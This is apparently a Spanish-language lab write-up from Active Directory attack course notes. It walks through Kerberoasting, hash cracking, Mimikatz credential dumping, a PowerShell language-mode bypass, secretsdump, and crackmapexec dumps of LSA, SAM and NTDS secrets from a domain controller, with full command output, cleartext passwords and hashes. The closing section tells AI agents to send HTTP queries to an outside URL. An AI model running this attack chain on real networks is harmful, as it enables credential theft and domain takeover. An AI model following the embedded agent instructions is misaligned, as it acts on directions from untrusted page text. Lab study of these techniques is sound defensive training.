# Learning Objective - 7
## Process using svcadmin as service account
```
PS C:\AD\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 2
[*] SamAccountName : websvc
[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast
[*] SamAccountName : svcadmin
[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast
[*] Roasted hashes written to : C:\AD\Tools\hashes.kerberoast
```
```
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: hashes.kerberoast
Time.Started.....: Thu Feb 22 04:26:58 2024, (1 min, 6 secs)
Time.Estimated...: Thu Feb 22 04:28:04 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Mod........: Rules (clem9669_small.rule.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 164.3 MH/s (4.97ms) @ Accel:8 Loops:128 Thr:32 Vec:1
Recovered........: 0/2 (0.00%) Digests (total), 0/2 (0.00%) Digests (new), 0/2 (0.00%) Salts
Progress.........: 11045180300/11045180300 (100.00%)
Rejected.........: 0/11045180300 (0.00%)
Restore.Point....: 14344390/14344390 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:384-385 Iteration:0-128
Candidate.Engine.: Device Generator
Candidates.#1....: !!sexyangel!! -> retr02301
Hardware.Mon.#1..: Temp: 62c Fan: 32% Util: 40% Core:2025MHz Mem:10251MHz Bus:16
Started: Thu Feb 22 04:26:57 2024
Stopped: Thu Feb 22 04:28:05 2024
```
:c
Pero...
Entonces, como tenemos la credenciales intentamos:
```
crackmapexec smb 172.16.4.44 -u ciadmin -p *ContinuousIntrusion123 -x whoami
SMB 172.16.4.44 445 DCORP-MGMT [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB 172.16.4.44 445 DCORP-MGMT [+] dollarcorp.moneycorp.local\ciadmin:*ContinuousIntrusion123 (Pwn3d!)
SMB 172.16.4.44 445 DCORP-MGMT [+] Executed command
SMB 172.16.4.44 445 DCORP-MGMT dcorp\ciadmin
```
Respuesta:
```
sqlservr.exe
```
## NTLM hash of svcadmin account
[dcorp-mgmt]: PS C:\> .\SafetyKatz.exe "sekurlsa::logonPasswords full" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::logonPasswords full
Authentication Id : 0 ; 132376 (00000000:00020518)
Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:31:39 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1118
msv :
[00000003] Primary
* Username : svcadmin
* Domain : dcorp
* NTLM : b38ff50264b74508085d82c69794a4d8
* SHA1 : a4ad2cd4082079861214297e1cae954c906501b9
* DPAPI : f26ae0cc48396dccd8caa24cd33127e7
tspkg :
wdigest :
* Username : svcadmin
* Domain : dcorp
* Password : (null)
kerberos :
* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ThisisBlasphemyThisisMadness!!
ssp :
credman :
Respuesta:
```
b38ff50264b74508085d82c69794a4d8
```
## NTLM hash of srvadmin extracted from dcorp-adminsrv
```
impacket-secretsdump -hashes ':b38ff50264b74508085d82c69794a4d8' 'svcadmin@172.16.4.101'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0aa524e1204e0a68be320cc136ed76b9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2c0bba089d2d62e4d8911fc2fcc0c2e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
DOLLARCORP.MONEYCORP.LOCAL/websvc:$DCC2$10240#websvc#5100e73bf7f60de365fe1e39d21070c9
DOLLARCORP.MONEYCORP.LOCAL/appadmin:$DCC2$10240#appadmin#8bb559da7ec65410afbd8c561b37f5b5
DOLLARCORP.MONEYCORP.LOCAL/srvadmin:$DCC2$10240#srvadmin#904d497b20b7f6aa8667a17d6405289d
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
dcorp\DCORP-ADMINSRV$:aes256-cts-hmac-sha1-96:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
dcorp\DCORP-ADMINSRV$:aes128-cts-hmac-sha1-96:83bfc18bd7f63a5921bf0ce2eb87755f
dcorp\DCORP-ADMINSRV$:des-cbc-md5:384552e53d8acdea
dcorp\DCORP-ADMINSRV$:plain_password_hex:51003a00680046005400270021004600550058005000360045005f003200290043004b002000640078006d00320076006c002a0027004e003e0061003b007a002d004e0049004d006f006700650069004200740048004d0074006a006700770040002c004c0078003a00590044002e003d002200350047005b0065002000200059002b0077004e0040005e00340034003e00490054004000730064005e0044007800510034004800570052005900360025003200300038003f006c005400450062005500600075002e0048003000640025007a005900490057002f006400400051006100540037005a00740064002700
dcorp\DCORP-ADMINSRV$:aad3b435b51404eeaad3b435b51404ee:b5f451985fd34d58d5120816d31b5565:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb769847ee855152df7a4594c40a86f4e4212d031
dpapi_userkey:0x15ed629ec20c5b5e266129832d792b0bc84b1010
[*] NL$KM
0000 09 C8 7B C2 96 41 6E CB B2 F6 1B DC 29 5C 39 76 ..{..An.....)\9v
0010 7E A6 22 97 DC D3 BE 6B C3 71 48 71 61 6B B2 B3 ~."....k.qHqak..
0020 D0 D6 E0 48 F0 8B 7D 8B 8B 14 95 05 B4 21 FE 93 ...H..}......!..
0030 28 51 47 F1 26 24 B5 F4 E4 20 B6 AC E5 90 33 02 (QG.&$... ....3.
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] _SC_SNMPTRAP
dcorp\websvc:AServicewhichIsNotM3@nttoBe
[*] _SC_wmiApSrv
dcorp\appadmin:*ActuallyTheWebServer1
[*] Cleaning up...
[*] Stopping service RemoteRegistry
```
Verificando el LanguageMode
{% code overflow="wrap" %}
```
[dcorp-adminsrv]: PS C:\Program Files> echo '$ExecutionContext.SessionState.LanguageMode' > test.ps1
[dcorp-adminsrv]: PS C:\Program Files> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
[dcorp-adminsrv]: PS C:\Program Files> .\test.ps1
FullLanguage
```
{% endcode %}
Agregamos una linea dentro del script Invoke-Mimikatz.ps1.
```
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "Sekurlsa::LogonPasswords"'
```
Luego ejecutamos el Mimikatz y respondemos las flags.
{% code overflow="wrap" %}
```
PS C:\Program Files> .\Invoke-Mimikatz.ps1
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # privilege::debug
Privilege '20' OK
mimikatz(powershell) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
616 {0;000003e7} 1 D 16097 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;00e70446} 0 D 15141446 dcorp\svcadmin S-1-5-21-719815819-3726368948-3917688648-1118 (11g,24p) Primary
* Thread Token : {0;000003e7} 1 D 18044422 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(powershell) # Sekurlsa::LogonPasswords
Authentication Id : 0 ; 752154 (00000000:000b7a1a)
Session : RemoteInteractive from 2
User Name : srvadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:45:15 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1115
msv :
[00000003] Primary
* Username : srvadmin
* Domain : dcorp
* NTLM : a98e18228819e8eec3dfa33cb68b0728
* SHA1 : f613d1bede9a620ba16ae786e242d3027809c82a
* DPAPI : a593cded7a622d70818fb3315264a140
tspkg :
wdigest :
* Username : srvadmin
* Domain : dcorp
* Password : (null)
kerberos :
* Username : srvadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 144880 (00000000:000235f0)
Session : Service from 0
User Name : websvc
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:31:06 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1114
msv :
[00000003] Primary
* Username : websvc
* Domain : dcorp
* NTLM : cc098f204c5887eaa8253e7c2749156f
* SHA1 : 36f2455c767ac9945fdc7cd276479a6a011e154b
* DPAPI : afa3166d71b438639f1c77118153d316
tspkg :
wdigest :
* Username : websvc
* Domain : dcorp
* Password : (null)
kerberos :
* Username : websvc
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : AServicewhichIsNotM3@nttoBe
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 539692 (00000000:00083c2c)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:41:47 PM
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
ssp :
credman :
Authentication Id : 0 ; 144881 (00000000:000235f1)
Session : Service from 0
User Name : appadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:31:06 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1117
msv :
[00000003] Primary
* Username : appadmin
* Domain : dcorp
* NTLM : d549831a955fee51a43c83efb3928fa7
* SHA1 : 07de541a289d45a577f68c512c304dfcbf9e4816
* DPAPI : a5d49d98574a7574ab70fa77797c367d
tspkg :
wdigest :
* Username : appadmin
* Domain : dcorp
* Password : (null)
kerberos :
* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ActuallyTheWebServer1
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 21178 (00000000:000052ba)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
ssp :
credman :
Authentication Id : 0 ; 21140 (00000000:00005294)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
ssp :
credman :
Authentication Id : 0 ; 20080 (00000000:00004e70)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2/19/2024 11:30:49 PM
SID :
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/19/2024 11:30:49 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
ssp :
credman :ls
```
{% endcode %}
```
crackmapexec smb 172.16.4.44 -u ciadmin -p *ContinuousIntrusion123 --lsa
SMB 172.16.4.44 445 DCORP-MGMT [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB 172.16.4.44 445 DCORP-MGMT [+] dollarcorp.moneycorp.local\ciadmin:*ContinuousIntrusion123 (Pwn3d!)
SMB 172.16.4.44 445 DCORP-MGMT [+] Dumping LSA secrets
SMB 172.16.4.44 445 DCORP-MGMT DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa9ef2da703179
SMB 172.16.4.44 445 DCORP-MGMT DOLLARCORP.MONEYCORP.LOCAL/mgmtadmin:$DCC2$10240#mgmtadmin#b51b86694af5c690d2ad019fbfc00707
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:aes256-cts-hmac-sha1-96:b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:aes128-cts-hmac-sha1-96:0049f234ae46eba0bfb2ced5b8c8d2b4
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:des-cbc-md5:a79234f220c4549e
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:plain_password_hex:34003f0050006800430068004b005000280060003f00790057006000450038003d0056004d00320051004900310033004f00210069002a00330051003f005700560042002200580029003d003e0049006c0033003d00410063007a004a0030005e005400210058005d00720026003a002600790047003400310060002a002f0024005e0034002b00450065005a00300037003f007a00460032005a00330060003a005b004a0064002a0046002f007a005f00500060007000360042003900580048005e00670024002a006d005800490051004d00580059002800530063003f0033005c00410036004900430072005800
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:aad3b435b51404eeaad3b435b51404ee:0878da540f45b31b974f73312c18e754:::
SMB 172.16.4.44 445 DCORP-MGMT dpapi_machinekey:0xb3084493f6af9cf8b2964ee53accccd428737b2c
dpapi_userkey:0xe46d070e975b2473e749e7927a64a61fe1575b20
SMB 172.16.4.44 445 DCORP-MGMT NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB 172.16.4.44 445 DCORP-MGMT dcorp\svcadmin:*ThisisBlasphemyThisisMadness!!
SMB 172.16.4.44 445 DCORP-MGMT [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-MGMT_172.16.4.44_2024-02-22_044511.secrets and /home/dsds/.cme/logs/DCORP-MGMT_172.16.4.44_2024-02-22_044511.cached
```
Probamos las nuevas creds.
```
crackmapexec smb 172.16.4.44 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!'
SMB 172.16.4.44 445 DCORP-MGMT [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB 172.16.4.44 445 DCORP-MGMT [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
```
Obtenemos la IP del dominio.
```
PS C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors> nslookup.exe dollarcorp.moneycorp.local
Server: UnKnown
Address: 172.16.2.1
Name: dollarcorp.moneycorp.local
Address: 172.16.2.1
```
Probamos las creds en el DC.
```
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!'
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
```
Y dumpeamos todos los hashes.
```
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --sam
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB 172.16.2.1 445 DCORP-DC [+] Dumping SAM hashes
SMB 172.16.2.1 445 DCORP-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:a102ad5753f4c441e3af31c97fad86fd:::
SMB 172.16.2.1 445 DCORP-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 172.16.2.1 445 DCORP-DC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
SMB 172.16.2.1 445 DCORP-DC [+] Added 3 SAM hashes to the database
```
```
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --lsa
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB 172.16.2.1 445 DCORP-DC [+] Dumping LSA secrets
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:aes256-cts-hmac-sha1-96:f4583f2be42c52751be1ce4e8f51c3c256c89be2b41e0b6c57c8f2cd4edadfcf
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:aes128-cts-hmac-sha1-96:10715e504e5e3b6825f0a58aabd03108
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:des-cbc-md5:bc321ad310ce1ab5
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:plain_password_hex:9d2b4437a83b9f4b7038e6fdb58f506b95726a3034a92bac398a7dd61856d91ce33067a9d945f051ed1b1de95feffd32eef8481b25306953859d7242259108676568b30259b28570e0fe906928f4fcf1ae5698ae526b7c17b02a43e90b7fc2902351adc7f1bd3e8e03c0050123b1db24af4397449ebd8ea44347e68071d76a9a78b1f315229f3a2915397621d8cb968518d4937dd8ea46a988276c15a85bf0f7db00800120c318d73cdff23562b8e5d96af5754c507a760e9ba73c4ce67cb74b349f340fdd8dc9e0bac7ebd390afa440c23c8e0059de3f472359c205f7ddea65ae0efd662a35d7dc0335968eeb642886
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:aad3b435b51404eeaad3b435b51404ee:ef7a661f7edb7f5a1be191640342d6b7:::
SMB 172.16.2.1 445 DCORP-DC dpapi_machinekey:0x558f948af84f9dec3acf3499b5e9af0de2d8e803
dpapi_userkey:0xb1b020a793cbecd7d3ad7aacbc6b73f33c9e4d43
SMB 172.16.2.1 445 DCORP-DC NL$KM:2155a8f764dd9afa80950f03e8e4765e11349956de62e100c6fd7db814af4f7358c168e316e2049893a539c61b7ae419fee6efdc7364728cf92af25c68d2db73
SMB 172.16.2.1 445 DCORP-DC [+] Dumped 7 LSA secrets to /home/dsds/.cme/logs/DCORP-DC_172.16.2.1_2024-02-22_050159.secrets and /home/dsds/.cme/logs/DCORP-DC_172.16.2.1_2024-02-22_050159.cached
```
```
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --ntds
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB 172.16.2.1 445 DCORP-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 172.16.2.1 445 DCORP-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:af0686cc0ca8f04df42210c9ac980760:::
SMB 172.16.2.1 445 DCORP-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 172.16.2.1 445 DCORP-DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e9815869d2090ccfca61c1fe0d23986:::
SMB 172.16.2.1 445 DCORP-DC sqladmin\sqladmin:1113:aad3b435b51404eeaad3b435b51404ee:07e8be316e3da9a042a9cb681df19bf5:::
SMB 172.16.2.1 445 DCORP-DC websvc\websvc:1114:aad3b435b51404eeaad3b435b51404ee:cc098f204c5887eaa8253e7c2749156f:::
SMB 172.16.2.1 445 DCORP-DC srvadmin\srvadmin:1115:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB 172.16.2.1 445 DCORP-DC appadmin\appadmin:1117:aad3b435b51404eeaad3b435b51404ee:d549831a955fee51a43c83efb3928fa7:::
SMB 172.16.2.1 445 DCORP-DC svcadmin\svcadmin:1118:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB 172.16.2.1 445 DCORP-DC testda\testda:1119:aad3b435b51404eeaad3b435b51404ee:a16452f790729fa34e8f3a08f234a82c:::
SMB 172.16.2.1 445 DCORP-DC mgmtadmin\mgmtadmin:1120:aad3b435b51404eeaad3b435b51404ee:95e2cd7ff77379e34c6e46265e75d754:::
SMB 172.16.2.1 445 DCORP-DC ciadmin\ciadmin:1121:aad3b435b51404eeaad3b435b51404ee:e08253add90dccf1a208523d02998c3d:::
SMB 172.16.2.1 445 DCORP-DC sql1admin\sql1admin:1122:aad3b435b51404eeaad3b435b51404ee:e999ae4bd06932620a1e78d2112138c6:::
SMB 172.16.2.1 445 DCORP-DC dollarcorp.moneycorp.local\studentadmin:4181:aad3b435b51404eeaad3b435b51404ee:d1254f303421d3cdbdc4c73a5bce0201:::
SMB 172.16.2.1 445 DCORP-DC DCORP-DC$:1000:aad3b435b51404eeaad3b435b51404ee:ef7a661f7edb7f5a1be191640342d6b7:::
SMB 172.16.2.1 445 DCORP-DC DCORP-ADMINSRV$:1105:aad3b435b51404eeaad3b435b51404ee:b5f451985fd34d58d5120816d31b5565:::
SMB 172.16.2.1 445 DCORP-DC DCORP-APPSRV$:1106:aad3b435b51404eeaad3b435b51404ee:b4cb7bf8b93c78b8051c7906bb054dc5:::
SMB 172.16.2.1 445 DCORP-DC DCORP-CI$:1107:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3:::
SMB 172.16.2.1 445 DCORP-DC DCORP-MGMT$:1108:aad3b435b51404eeaad3b435b51404ee:0878da540f45b31b974f73312c18e754:::
SMB 172.16.2.1 445 DCORP-DC DCORP-MSSQL$:1109:aad3b435b51404eeaad3b435b51404ee:b205f1ca05bedace801893d6aa5aca27:::
SMB 172.16.2.1 445 DCORP-DC DCORP-SQL1$:1110:aad3b435b51404eeaad3b435b51404ee:3686dfb420dc0f9635e70c6ca5875b49:::
SMB 172.16.2.1 445 DCORP-DC DCORP-STDADMIN$:4202:aad3b435b51404eeaad3b435b51404ee:e444bbf444732fc38065ea9e9255ab03:::
SMB 172.16.2.1 445 DCORP-DC mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e:::
SMB 172.16.2.1 445 DCORP-DC US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6:::
SMB 172.16.2.1 445 DCORP-DC ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a:::
```
Respuesta:
```
b38ff50264b74508085d82c69794a4d8
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-7.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.